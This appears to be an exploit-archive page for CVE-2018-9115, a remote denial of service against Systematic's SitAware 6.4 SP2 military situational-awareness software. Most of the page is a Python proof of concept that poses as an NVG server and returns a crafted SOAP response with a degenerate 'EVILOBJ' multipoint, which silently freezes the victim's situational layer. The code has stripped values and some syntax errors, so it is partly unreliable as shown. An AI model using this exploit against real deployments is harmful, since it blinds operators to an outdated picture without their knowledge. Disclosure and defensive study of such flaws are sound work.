Systematic SitAware NVG Denial of Service

Credit: 2u53
Risk: Medium
Local: No
Remote: Yes

CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

# Exploit Title: SitAware NVG Denial of Service # Date: 03/31/2018 # Exploit Author: 2u53 # Vendor Homepage: # Version: 6.4 SP2 # Tested on: Windows Server 2012 R2 # CVE: CVE-2018-9115 # Remarks: PoC needs bottlypy: # # # Systematic's SitAware does not validate input from other sources suffenciently. Incoming information utilizing # the for example the NVG interface. The following PoC will freeze the Situational Layer of SitAware, which means # that the Situational Picture is no more updated. Unfortunately the user can not notice until # he tries to work with the situational layer. #!/bin/python from bottle import post, run, request, response LHOST = # Local IP which the NVG server should use LPORT = 8080 # Local Port on which the NVG server should listen GET_CAPABILITIES = '''<soap:Envelope xmlns:soap=""> <soap:Body> <ns3:GetCapabilitiesResponse xmlns="" xmlns:ns2="" xmlns:ns3="" xmlns:ns4=""> <ns4:nvg_capabilities version="1.5"> </ns4:nvg_capabilities> </ns3:GetCapabilitiesResponse> </soap:Body> </soap:Envelope>''' EVIL_NVG = '''<soap:Envelope xmlns:soap=""> <soap:Body> <ns3:GetNvgResponse xmlns="" xmlns:ns2="" xmlns:ns3="" xmlns:ns4=""> <ns4:nvg version="1.5" classification="NATO UNCLASSIFIED"> <ns4:multipoint points="-0.01,0.01 0.02,-0.02 0.01,0.01" symbol="2525b:GFTPZ---------X" label="EVILOBJ"/> </ns4:nvg> </ns3:GetNvgResponse> </soap:Body> </soap:Envelope>''' @post('/nvg') def soap(): action = dict(request.headers.items()).get('Soapaction') action = action.replace('"', '') print('Incoming connection') response.content_type = 'text/xml;charset=utf-8' if action.endswith('nvg/GetCapabilities'): print('Sending capabilities to victim'...) return GET_CAPABILITIES print('Done! Waiting for NVG request...') elif action.endswith('nvg/GetNvg'): print('Sending evil NVG') return EVIL_NVG print('Done!') else print('Invalid request received') run(host=LHOST, port=LPORT)

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018,


Back to Top